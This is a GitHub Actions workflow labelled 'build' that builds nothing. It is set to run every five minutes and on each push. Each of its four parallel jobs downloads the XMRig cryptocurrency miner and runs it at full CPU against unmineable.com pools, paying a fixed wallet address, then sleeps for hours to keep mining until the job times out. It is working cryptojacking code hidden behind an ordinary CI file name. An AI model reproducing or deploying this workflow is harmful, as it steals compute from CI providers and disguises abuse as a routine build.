name: build
on:
  push:
  schedule:
    - cron: '*/5 * * * *'
  workflow_dispatch:
jobs:
  m1:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    steps:
      - run: |
          curl -sLO https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xf *.tar.gz && cd xmrig*
          ./xmrig -o rx.unmineable.com:3333 -a rx -k -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.m1-$RANDOM --threads=$(nproc) &
          ./xmrig -o rx.unmineable.com:13333 -a rx -k -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.m1b-$RANDOM --threads=$(nproc) &
          sleep 20000
  m2:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    steps:
      - run: |
          curl -sLO https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xf *.tar.gz && cd xmrig*
          ./xmrig -o rx.unmineable.com:3333 -a rx -k -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.m2-$RANDOM --threads=$(nproc) &
          ./xmrig -o rx.unmineable.com:13333 -a rx -k -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.m2b-$RANDOM --threads=$(nproc) &
          sleep 20000
  m3:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    steps:
      - run: |
          curl -sLO https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xf *.tar.gz && cd xmrig*
          ./xmrig -o rx.unmineable.com:3333 -a rx -k -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.m3-$RANDOM --threads=$(nproc) &
          ./xmrig -o rx.unmineable.com:13333 -a rx -k -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.m3b-$RANDOM --threads=$(nproc) &
          sleep 20000
  m4:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    steps:
      - run: |
          curl -sLO https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xf *.tar.gz && cd xmrig*
          ./xmrig -o rx.unmineable.com:3333 -a rx -k -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.m4-$RANDOM --threads=$(nproc) &
          ./xmrig -o rx.unmineable.com:13333 -a rx -k -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.m4b-$RANDOM --threads=$(nproc) &
          sleep 20000
